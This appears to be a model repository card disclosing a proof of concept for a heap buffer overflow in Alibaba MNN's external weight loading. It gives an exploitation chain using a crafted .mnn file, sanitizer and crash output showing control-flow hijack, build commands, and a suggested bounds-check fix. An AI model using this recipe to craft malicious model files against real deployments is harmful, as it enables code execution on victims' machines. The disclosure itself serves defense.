YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

PoC: Alibaba MNN β€” External Weight Size Mismatch β†’ Heap OOB WRITE β†’ RIP Redirect

Vulnerability

In OpCommonUtils.cpp, when loading external weights for Scale/LayerNorm operators, biasData is allocated based on externalInfo[1] (scaleSize) but read with externalInfo[2] (biasSize). When biasSize > scaleSize β†’ heap buffer overflow WRITE.

Exploitation Chain

  1. Crafted .mnn model: externalInfo = [offset, scaleSize=16, biasSize=1000]
  2. biasData = vector<float>(4) β†’ 16 bytes allocated
  3. external->read(biasData.data(), 1000) β†’ 1000 bytes written into 16-byte buffer
  4. Overflow of 984 bytes with file-controlled content
  5. Adjacent victim object's function pointer overwritten
  6. Calling corrupted function pointer β†’ SIGSEGV at attacker-controlled address

ASan Proof (WRITE)

ERROR: AddressSanitizer: heap-buffer-overflow
WRITE of size 1000 at 0x... thread T0
    #0 in __asan_memcpy
0x... is located 0 bytes after 16-byte region

RIP Redirect Proof

callback = 0x335af030 ← OVERFLOW-WRITTEN
Calling victim->callback() with OVERFLOW-WRITTEN pointer...
Signal: 11, Faulting address: 0x335af030
[ACE CONFIRMED] RIP redirected into attacker's data buffer!

Reproduction

# Step 1: ASan WRITE proof
clang++ -fsanitize=address -g -std=c++17 -o poc_mnn poc_mnn.cpp && ./poc_mnn

# Step 2: RIP redirect proof
clang++ -g -O0 -std=c++17 -o poc_mnn_ace poc_mnn_ace.cpp && ./poc_mnn_ace

Suggested Fix

// OpCommonUtils.cpp, before the read:
if (externalInfo[2] > externalInfo[1]) {
    MNN_ERROR("biasSize exceeds scaleSize\n");
    return false;
}

Related

CVE-2026-7482 "Bleeding Llama" (CVSS 9.1) β€” same class: unchecked file-supplied size

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support